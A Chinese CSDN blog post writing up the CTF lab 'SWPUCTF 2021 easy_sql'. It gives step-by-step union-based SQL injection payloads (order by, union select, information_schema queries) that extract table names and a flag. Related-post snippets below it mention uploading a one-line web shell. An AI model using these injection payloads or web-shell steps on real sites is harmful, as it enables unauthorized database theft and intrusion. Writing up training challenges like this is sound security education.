[SWPUCTF 2021 新生赛]easy_sql

最新推荐文章于 2023-10-06 10:11:45 发布
最新推荐文章于 2023-10-06 10:11:45 发布
阅读量3.8k 收藏 18
点赞数 8
分类专栏: ctf 文章标签: SQL注入 字符型漏洞 数据库 信息泄露 安全防护
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56301349/article/details/125809900
版权

拿到题目,查看源码,要求我们输入参数wllm

首先输入wllm=1,回显正常。

输入wllm=1',出现报错,可以判断为字符型漏洞。

1. 先查看一下字段列数。

?wllm=-1' order by 3--+
?wllm=-1' order by 4--+

 ?wllm=1' order by 4--+报错,所以为3列.

2.查看回显:

?wllm=-1' union select 1,2,3--+

3.查数据库名:

?wllm=-1' union select 1,2,database()--+

 4.查看test_db库的表

?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+

 

 5.查字段:

?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+

 

 6.出现flag字段,查看flag字段的内容:

 -1' union select 1,2,group_concat(id,flag) from test_tb--+

最后成功解出该题。

 

Aries,
关注
  • 8
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[SWPUCTF 2021 新生]easyupload1.0
yeah123_的博客
07-23 245
我们发现,一句话木马上传成功,木马写进去就可以连接蚁剑了。我们将1.jpg改为1.php看是否上传成功。我们尝试打开终端,在终端中进行查找。首先,我们先上传一句话木马图片。题目考察类型:文件上传。服了,不给我flag。
easy_sql
satasun的博客
04-19 559
easy_sql 判断注入类型(字符型注入/数字型输入) http://hwserver.bi0x.cn:8302/?id=1 and 1=1# 发现是数字型注入 判断字段数 http://hwserver.bi0x.cn:8302/?id=1 order by 3# 判断注入点 http://hwserver.bi0x.cn:8302/?id=0 union select 1,2,3# 1 2 3都是注入点 爆库名 http://hwserver.bi0x.cn:8302/?id=0 uni
Easy_draw.rar_easy _easy draw_easydraw
09-24
【标题】"Easy_draw.rar" 是一个压缩包文件,其中包含了一个名为 "easy draw" 或 "EasyDraw" 的简易图像处理软件。这个软件是专为编程初学者设计的,旨在帮助他们入门图形用户界面(GUI)开发和图像处理技术。 ...
2021莲城杯比题包.zip
10-12
这个比很可能是一个网络安全技术挑战,涉及了CTF(Capture The Flag)的形式,这是一种常见的网络安全模式,参者需要展示他们的信息安全技能,包括但不限于密码学、漏洞分析、逆向工程、网络侦查等。...
easy_VM.rar_easy
09-23
本文将深入探讨一款名为“easy_VM.rar”的简易虚拟机,该虚拟机专为Windows操作系统设计,虽然功能相对简单,但其核心原理和实现方式对于理解虚拟化技术的基础概念具有重要意义。 “easy_VM.rar”是一款轻量级的...
easy_c.zip_easy
09-22
【标题】"easy_c.zip_easy" 是一个专为C语言初学者设计的压缩包,它包含了一系列简单的小型程序,旨在帮助初学者更好地理解和实践C编程基础。这些小程序的目的是让学习过程更加直观和易懂,使初学者能够通过实际操作...
Fujitsu.zip_easy _fujitsu
09-23
《Fujitsu_Easy_Kit试用手记_从入门到精通》 富士通(Fujitsu)是一家全球知名的IT企业,其产品线广泛,涵盖了硬件、软件和服务等多个领域。Fujitsu_Easy_Kit是富士通推出的一款便捷式解决方案,旨在简化用户的IT操作...
简易SQL----Easy
09-07
简单化SQL增删改查,支持Access数据库。 可复制粘贴字段,方便写SQL语句。
Easysql
weixin_43610673的博客
03-04 739
无in注表名 无union select和字段名注数据 Fuzz测试过滤的关键词有: union *** select join information_schema in or and sleep benchmark if sys.schema_auto_increment_columns 因为过滤了in所以常用查询表名的方法不能用了 常用:information_schema,mysql.i...
[SWPUCTF 2021 新生]easy_sql - 联合注入||报错注入||sqlmap
最新发布
oZuoShen123的博客
10-06 795
得到:XPATH syntax error: ‘~NSSCTF{82bf2238-f61d-41f1-b103-’最终:flag=NSSCTF{82bf2238-f61d-41f1-b103-848e28154cee}得到:XPATH syntax error: ‘~ test_tb,users ~’得到:Your Login name:xxx Your Password:yyy。得到:XPATH syntax error: ‘~ id,flag ~’说明无回显,尝试报错注入。表为:test_db。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值